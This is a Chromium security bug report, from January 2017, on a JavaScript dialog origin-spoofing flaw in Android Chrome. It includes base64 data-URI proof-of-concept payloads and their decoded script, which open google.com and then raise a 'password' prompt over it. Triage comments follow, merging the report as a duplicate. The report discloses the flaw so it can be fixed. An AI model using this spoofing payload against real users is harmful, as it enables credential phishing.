Issue 677728
Issue metadata

Status: Duplicate
Merged: issue 606104
Closed: Jan 2017
OS: Android
Pri: 1
Type: Bug-Security

Security: Chrome JavaScript dialogs (alert/prompt/confirm) spoof

Reported by xis...@gmail.com, Jan 1 2017

Issue description

VULNERABILITY DETAILS
Chrome is prone to a dialog box origin spoofing vulnerability. The vulnerability presents itself in that dialog boxes from inactive windows may appear in other, active windows. This issue may allow a remote attacker to carry out phishing-style attacks.

VERSION
Chrome Version: 55.0.2883.91 [Stable]
Operating System: [Android]
Phone: Nexus Phone

REPRODUCTION CASE
POC(1)
<a href="data:text/html;base64,PHNjcmlwdD4NCmZ1bmN0aW9uIGNjKCl7DQoJIHByb21wdCgicGFzc3dvcmQiKTsNCn0NCg0KZnVuY3Rpb24gYmIoKXsgDQoJbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCglsaW5rLmhyZWYgPSAnaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbSc7DQoJbGluay50YXJnZXQ9Im5ldyI7DQoJbGluay5jbGljaygpOw0KCWRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQobGluayk7DQp9DQoNCmZ1bmN0aW9uIGFhKCl7DQoJYmIoKTsNCgljYygpOw0KfQ0KPC9zY3JpcHQ+DQo8YnV0dG9uIG9uY2xpY2s9ImFhKCkiPkNsaWNrIG1lPC9idXR0b24+">Click me</a>

POC(2)
<object data="data:text/html;base64,PHNjcmlwdD4NCmZ1bmN0aW9uIGNjKCl7DQoJIHByb21wdCgicGFzc3dvcmQiKTsNCn0NCg0KZnVuY3Rpb24gYmIoKXsgDQoJbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCglsaW5rLmhyZWYgPSAnaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbSc7DQoJbGluay50YXJnZXQ9Im5ldyI7DQoJbGluay5jbGljaygpOw0KCWRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQobGluayk7DQp9DQoNCmZ1bmN0aW9uIGFhKCl7DQoJYmIoKTsNCgljYygpOw0KfQ0KPC9zY3JpcHQ+DQo8YnV0dG9uIG9uY2xpY2s9ImFhKCkiPkNsaWNrIG1lPC9idXR0b24+"></object>

base64 payload code:

<script>
function cc(){
 prompt("password");
}

function bb(){ 
 link = document.createElement('a');
 link.href = 'https://www.google.com';
 link.target="new";
 link.click();
 document.body.appendChild(link);
}

function aa(){
 bb();
 cc();
}
</script>
<button onclick="aa()">Click me</button>

Attachments: spoof-1.png (70.7 KB), spoof-2.png (94.2 KB)
Components: UI>Browser>Navigation

Comment 2 by kenrb@chromium.org, Jan 2 2017

Owner: nparker@chromium.org
Status: Assigned (was: Unconfirmed)
Assigning to nparker@ for triage.
Labels: Security_Impact-Stable OS-Android
I'm setting Medium severity for now. Please feel free to adjust as needed.
Labels: Pri-1
Labels: Security_Severity-Medium

Comment 7 by sheriffbot@chromium.org, Jan 4 2017

Labels: M-56
Cc: nparker@chromium.org
Owner: a...@chromium.org
I'd agree w/ medium, since it's showing attacker-controlled content over another origin.

avi -- Is this a race? Seems like if the click comes before the prompt(), the latter shouldn't run on the new page.
I believe this is a dupe of bug 606104.
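To make the race discussed above concrete from the browser side, here is an added model (not Chromium code, and not the reporter's POC) that replays the POC's sequence, a synthetic click into a new tab followed by prompt() from the original page, under two hypothetical dialog policies: a naive one that renders whatever the caller requests, and one that only renders a dialog when the requesting tab is in the foreground. The origins and policy names are assumptions for the illustration.

```javascript
// Added illustration, not Chromium code: a minimal model of a browser's
// JavaScript-dialog policy, used to replay the POC (open a new tab, then
// call prompt() from the original page) and check which policy lets a
// dialog from an inactive tab appear over the newly active tab.

class BrowserModel {
  constructor(policy) {
    this.policy = policy;        // "naive" or "foreground-only" (assumed names)
    this.tabs = new Map();
    this.activeTab = null;
    this.nextId = 1;
    this.shown = [];             // dialogs actually rendered to the user
    this.suppressed = [];        // dialogs refused because their tab was inactive
  }

  openTab(origin) {
    const id = this.nextId++;
    this.tabs.set(id, { id, origin });
    this.activeTab = id;         // a freshly opened tab takes the foreground
    return id;
  }

  // A document running in tab `fromTab` requests a modal dialog.
  requestDialog(fromTab, kind, message) {
    const requester = this.tabs.get(fromTab);
    const onTop = this.tabs.get(this.activeTab);
    const dialog = { kind, message, requester: requester.origin, overlays: onTop.origin };
    if (this.policy === "foreground-only" && fromTab !== this.activeTab) {
      this.suppressed.push(dialog);
      return { shown: false, reason: "requesting tab is not in the foreground" };
    }
    this.shown.push(dialog);
    return { shown: true, dialog };
  }

  // True if a rendered dialog came from an origin other than the one the
  // user was looking at: the spoofing condition described in the report.
  hasCrossOriginDialog() {
    return this.shown.some(d => d.requester !== d.overlays);
  }
}

function replayPoc(policy) {
  const b = new BrowserModel(policy);
  const attacker = b.openTab("https://attacker.example");  // constructed origin
  b.openTab("https://www.google.com");                     // bb(): link.click() into a new tab
  b.requestDialog(attacker, "prompt", "password");         // cc(): prompt() from the old tab
  return b;
}
```

Under the naive policy the prompt is rendered while google.com is the visible origin; under the foreground-only policy it is suppressed, which is the property a fix for this class of spoof needs to guarantee.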

Comment 10 by a...@chromium.org, Jan 4 2017

Mergedinto: 606104
Status: Duplicate (was: Assigned)
meacer, looks like it to me, too.

Comment 11 by xis...@gmail.com, Jan 5 2017

Hi, my POCs work well in the latest version of Android Chrome/Canary.
But I can't reproduce the POC of bug 606104.
Online demo: http://xisigr.com/test/spoof/chrome/dialog.html

Comment 12 by sheriffbot@chromium.org, Jan 4

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
